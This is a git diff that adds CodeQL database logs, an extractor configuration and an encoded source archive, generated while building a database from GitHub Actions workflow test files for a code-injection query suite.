Use this setting with caution, the Python extractor requires Python 3 to run.\n", + "type" : "string", + "pattern" : "^(py|python|python3)$" + } + } + } + ], + "java" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/java", + "extractor_options" : { + "exclude" : { + "title" : "A glob excluding files from analysis.", + "description" : "A glob indicating what files to exclude from the analysis.\n", + "type" : "string" + }, + "add_prefer_source" : { + "title" : "Whether to always prefer source files over class files.", + "description" : "A value indicating whether source files should be preferred over class files. If set to 'true', the extraction adds '-Xprefer:source' to the javac command line. If set to 'false', the extraction uses the default javac behavior ('-Xprefer:newer'). The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction (experimental).", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. 
Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "html" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/html" + } + ], + "xml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/xml" + } + ], + "properties" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/properties" + } + ], + "cpp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/cpp", + "extractor_options" : { } + } + ], + "swift" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/swift" + } + ], + "csv" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csv" + } + ], + "yaml" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml" + } + ], + "csharp" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/csharp", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. 
Accepted values are 'brotli' (the default, to write brotli-compressed TRAP), 'gzip', and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip|brotli)$" + } + } + }, + "buildless" : { + "title" : "Whether to use buildless (standalone) extraction.", + "description" : "A value indicating, which type of extraction the autobuilder should perform. If 'true', then the standalone extractor will be used, otherwise tracing extraction will be performed. The default is 'false'. Note that buildless extraction will generally yield less accurate analysis results, and should only be used in cases where it is not possible to build the code (for example if it uses inaccessible dependencies).\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "cil" : { + "title" : "Whether to enable CIL extraction.", + "description" : "A value indicating, whether CIL extraction should be enabled. The default is 'true'.\n", + "type" : "string", + "pattern" : "^(false|true)$" + }, + "logging" : { + "title" : "Options pertaining to logging.", + "description" : "Options pertaining to logging.", + "type" : "object", + "properties" : { + "verbosity" : { + "title" : "Extractor logging verbosity level.", + "description" : "Controls the level of verbosity of the extractor. 
The supported levels are (in order of increasing verbosity):\n - off\n - errors\n - warnings\n - info or progress\n - debug or progress+\n - trace or progress++\n - progress+++\n", + "type" : "string", + "pattern" : "^(off|errors|warnings|(info|progress)|(debug|progress\\+)|(trace|progress\\+\\+)|progress\\+\\+\\+)$" + } + } + } + } + } + ], + "javascript" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/javascript", + "extractor_options" : { + "skip_types" : { + "title" : "Skip type extraction for TypeScript", + "description" : "Whether to skip the extraction of types in a TypeScript application", + "type" : "string", + "pattern" : "^(false|true)$" + } + } + } + ], + "ruby" : [ + { + "extractor_root" : "/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/ruby", + "extractor_options" : { + "trap" : { + "title" : "Options pertaining to TRAP.", + "description" : "Options pertaining to TRAP.", + "type" : "object", + "properties" : { + "compression" : { + "title" : "Controls compression for the TRAP files written by the extractor.", + "description" : "This option is only intended for use in debugging the extractor. Accepted values are 'gzip' (the default, to write gzip-compressed TRAP) and 'none' (to write uncompressed TRAP).\n", + "type" : "string", + "pattern" : "^(none|gzip)$" + } + } + } + } + } + ] + } + } +[2024-03-01 13:05:58] [PROGRESS] database init> Calculating baseline information in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 +[2024-03-01 13:05:58] [SPAMMY] database init> Ignoring the following directories when processing baseline information: .git, .hg, .svn. 
+[2024-03-01 13:05:58] [DETAILS] database init> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/tools/osx64/scc --by-file --exclude-dir .git,.hg,.svn --format json --no-large --no-min . +[2024-03-01 13:05:58] [PROGRESS] database init> Calculated baseline information for languages: (71ms). +[2024-03-01 13:05:58] [PROGRESS] database init> Resolving extractor yaml. +[2024-03-01 13:05:58] [DETAILS] database init> Found candidate extractor root for yaml: /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml. +[2024-03-01 13:05:58] [PROGRESS] database init> Successfully loaded extractor YAML (yaml) from /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml. +[2024-03-01 13:05:58] [PROGRESS] database init> Created skeleton CodeQL database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. This in-progress database is ready to be populated by an extractor. +[2024-03-01 13:05:58] Plumbing command codeql database init completed. +[2024-03-01 13:05:58] [PROGRESS] database create> Running build command: [] +[2024-03-01 13:05:58] Running plumbing command: codeql database trace-command --working-dir=/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --index-traceless-dbs --no-db-cluster -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:58] Using autobuild script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/autobuild.sh. 
+[2024-03-01 13:05:58] [PROGRESS] database trace-command> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/autobuild.sh] +[2024-03-01 13:05:59] [build-stderr] Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] [build-stderr] /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db: Indexing files in in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] [build-stderr] Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh, /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/working/files-to-index11395055735303062068.list] +[2024-03-01 13:05:59] Plumbing command codeql database trace-command completed. +[2024-03-01 13:05:59] [PROGRESS] database create> Finalizing database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. +[2024-03-01 13:05:59] Running plumbing command: codeql database finalize --mode=trim --no-db-cluster -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:59] [PROGRESS] database finalize> Running TRAP import for CodeQL database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db... 
+[2024-03-01 13:05:59] Running plumbing command: codeql dataset import --dbscheme=/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/yaml.dbscheme -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/trap/yaml +[2024-03-01 13:05:59] Clearing disk cache since the version file /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache/version does not exist +[2024-03-01 13:05:59] Tuple pool not found. Clearing relations with cached strings +[2024-03-01 13:05:59] Trimming disk cache at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache in mode clear. +[2024-03-01 13:05:59] Sequence stamp origin is -6212520902965462594 +[2024-03-01 13:05:59] Pausing evaluation to hard-clear memory at sequence stamp o+0 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Pausing evaluation to quickly trim disk at sequence stamp o+1 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Pausing evaluation to zealously trim disk at sequence stamp o+2 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Trimming completed (6ms): Purged everything. 
+[2024-03-01 13:05:59] Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/trap/yaml +[2024-03-01 13:05:59] Found 27 TRAP files (71.04 KiB) +[2024-03-01 13:05:59] [PROGRESS] dataset import> Importing TRAP files +[2024-03-01 13:05:59] Importing argus_case_study.yml.trap.gz (1 of 27) +[2024-03-01 13:05:59] Importing changed-files.yml.trap.gz (2 of 27) +[2024-03-01 13:05:59] Importing comment_issue.yml.trap.gz (3 of 27) +[2024-03-01 13:05:59] Importing comment_issue_newline.yml.trap.gz (4 of 27) +[2024-03-01 13:05:59] Importing cross1.yml.trap.gz (5 of 27) +[2024-03-01 13:05:59] Importing cross2.yml.trap.gz (6 of 27) +[2024-03-01 13:05:59] Importing cross3.yml.trap.gz (7 of 27) +[2024-03-01 13:05:59] Importing discussion.yml.trap.gz (8 of 27) +[2024-03-01 13:05:59] Importing discussion_comment.yml.trap.gz (9 of 27) +[2024-03-01 13:05:59] Importing gollum.yml.trap.gz (10 of 27) +[2024-03-01 13:05:59] Importing image_link_generator.yml.trap.gz (11 of 27) +[2024-03-01 13:05:59] Importing inter-job.yml.trap.gz (12 of 27) +[2024-03-01 13:05:59] Importing issues.yaml.trap.gz (13 of 27) +[2024-03-01 13:05:59] Importing matrix.yml.trap.gz (14 of 27) +[2024-03-01 13:05:59] Importing no-flow1.yml.trap.gz (15 of 27) +[2024-03-01 13:05:59] Importing no-flow2.yml.trap.gz (16 of 27) +[2024-03-01 13:05:59] Importing pull_request_review.yml.trap.gz (17 of 27) +[2024-03-01 13:05:59] Importing pull_request_review_comment.yml.trap.gz (18 of 27) +[2024-03-01 13:05:59] Importing pull_request_target.yml.trap.gz (19 of 27) +[2024-03-01 13:05:59] Importing push.yml.trap.gz (20 of 27) +[2024-03-01 13:05:59] Importing simple1.yml.trap.gz (21 of 27) +[2024-03-01 13:05:59] Importing simple2.yml.trap.gz (22 of 27) +[2024-03-01 13:05:59] Importing test.yml.trap.gz (23 of 27) +[2024-03-01 13:05:59] Importing workflow_run.yml.trap.gz (24 of 27) +[2024-03-01 13:05:59] Importing action.yml.trap.gz (25 of 27) +[2024-03-01 13:05:59] Importing action.yml.trap.gz (26 
of 27) +[2024-03-01 13:05:59] Importing sourceLocationPrefix.trap.gz (27 of 27) +[2024-03-01 13:05:59] [PROGRESS] dataset import> Merging relations +[2024-03-01 13:05:59] Merging 1 fragment for 'files'. +[2024-03-01 13:05:59] Merged 208 bytes for 'files'. +[2024-03-01 13:05:59] Merging 1 fragment for 'folders'. +[2024-03-01 13:05:59] Merged 128 bytes for 'folders'. +[2024-03-01 13:05:59] Merging 1 fragment for 'containerparent'. +[2024-03-01 13:05:59] Merged 328 bytes for 'containerparent'. +[2024-03-01 13:05:59] Merging 1 fragment for 'yaml_scalars'. +[2024-03-01 13:05:59] Merged 12540 bytes (12.25 KiB) for 'yaml_scalars'. +[2024-03-01 13:05:59] Merging 1 fragment for 'yaml'. +[2024-03-01 13:05:59] Merged 33384 bytes (32.60 KiB) for 'yaml'. +[2024-03-01 13:05:59] Merging 1 fragment for 'locations_default'. +[2024-03-01 13:05:59] Merged 33384 bytes (32.60 KiB) for 'locations_default'. +[2024-03-01 13:05:59] Merging 1 fragment for 'yaml_locations'. +[2024-03-01 13:05:59] Merged 11128 bytes (10.87 KiB) for 'yaml_locations'. +[2024-03-01 13:05:59] Merging 1 fragment for 'sourceLocationPrefix'. +[2024-03-01 13:05:59] Merged 4 bytes for 'sourceLocationPrefix'. +[2024-03-01 13:05:59] Saving string and id pools to disk. +[2024-03-01 13:05:59] Finished importing TRAP files. +[2024-03-01 13:05:59] Read 360.45 KiB of uncompressed TRAP data. +[2024-03-01 13:05:59] Relation data size: 88.97 KiB (merge rate: 1.39 MiB/s) +[2024-03-01 13:05:59] String pool size: 2.06 MiB +[2024-03-01 13:05:59] ID pool size: 1.08 MiB +[2024-03-01 13:05:59] [PROGRESS] dataset import> Finished writing database (relations: 88.97 KiB; string pool: 2.06 MiB). +[2024-03-01 13:05:59] Pausing evaluation to close the cache at sequence stamp o+3 +[2024-03-01 13:05:59] The disk cache is freshly trimmed; leave it be. +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Plumbing command codeql dataset import completed. 
+[2024-03-01 13:05:59] [PROGRESS] database finalize> TRAP import complete (560ms). +[2024-03-01 13:05:59] Running plumbing command: codeql database cleanup --mode=trim -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:59] [PROGRESS] database cleanup> Cleaning up existing TRAP files after import... +[2024-03-01 13:05:59] [PROGRESS] database cleanup> TRAP files cleaned up (13ms). +[2024-03-01 13:05:59] [PROGRESS] database cleanup> Cleaning up scratch directory... +[2024-03-01 13:05:59] [PROGRESS] database cleanup> Scratch directory cleaned up (1ms). +[2024-03-01 13:05:59] Running plumbing command: codeql dataset cleanup --mode=trim -- /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml +[2024-03-01 13:05:59] [PROGRESS] dataset cleanup> Cleaning up dataset in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml. +[2024-03-01 13:05:59] Trimming disk cache at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml/default/cache in mode trim. +[2024-03-01 13:05:59] Sequence stamp origin is -6212520900610201313 +[2024-03-01 13:05:59] Pausing evaluation to quickly trim memory at sequence stamp o+0 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:05:59] Pausing evaluation to zealously trim disk at sequence stamp o+1 +[2024-03-01 13:05:59] Unpausing evaluation +[2024-03-01 13:06:00] Trimming completed (3ms): Trimmed disposable data from cache. +[2024-03-01 13:06:00] Pausing evaluation to close the cache at sequence stamp o+2 +[2024-03-01 13:06:00] The disk cache is freshly trimmed; leave it be. +[2024-03-01 13:06:00] Unpausing evaluation +[2024-03-01 13:06:00] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. 
+[2024-03-01 13:06:00] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml +[2024-03-01 13:06:00] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/db-yaml (3ms). +[2024-03-01 13:06:00] Plumbing command codeql dataset cleanup completed. +[2024-03-01 13:06:00] Plumbing command codeql database cleanup completed with status 0. +[2024-03-01 13:06:00] [PROGRESS] database finalize> Finished zipping source archive (20.00 KiB). +[2024-03-01 13:06:00] Plumbing command codeql database finalize completed. +[2024-03-01 13:06:00] [PROGRESS] database create> Successfully created database at /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db. +[2024-03-01 13:06:00] Terminating normally. diff --git a/db/log/database-index-files-20240301.130558.974.log b/db/log/database-index-files-20240301.130558.974.log new file mode 100644 index 00000000000..e204c6df37d --- /dev/null +++ b/db/log/database-index-files-20240301.130558.974.log 
@@ -0,0 +1,44 @@ +[2024-03-01 13:05:58] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db +[2024-03-01 13:05:58] Log file was started late. +[2024-03-01 13:05:59] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh. +[2024-03-01 13:05:59] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094 --format=json +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2... +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github... +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows... +[2024-03-01 13:05:59] [PROGRESS] resolve files> Scanning /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1... 
+[2024-03-01 13:05:59] Plumbing command codeql resolve files completed: + [ + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action2/action.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross1.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross3.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/changed-files.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue_newline.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/test.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_target.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/push.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/comment_issue.yml", + 
"/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow1.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/no-flow2.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/matrix.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/issues.yaml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/pull_request_review_comment.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple1.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/simple2.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml", + "/Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094/action1/action.yml" + ] +[2024-03-01 13:05:59] [DETAILS] database index-files> Found 26 files. 
+[2024-03-01 13:05:59] [PROGRESS] database index-files> /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db: Indexing files in in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094... +[2024-03-01 13:05:59] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh. +[2024-03-01 13:05:59] [PROGRESS] database index-files> Running command in /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/ql/test/query-tests/Security/CWE-094: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.3/yaml/tools/index-files.sh, /Users/pwntester/src/github.com/githubsecuritylab/codeql-actions/db/working/files-to-index11395055735303062068.list] +[2024-03-01 13:05:59] Terminating normally. 
diff --git a/db/src.zip b/db/src.zip new file mode 100644 index 0000000000000000000000000000000000000000..3006b787babfbfd5da405e1a7f5736ea762e4abe GIT binary patch literal 20479 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 
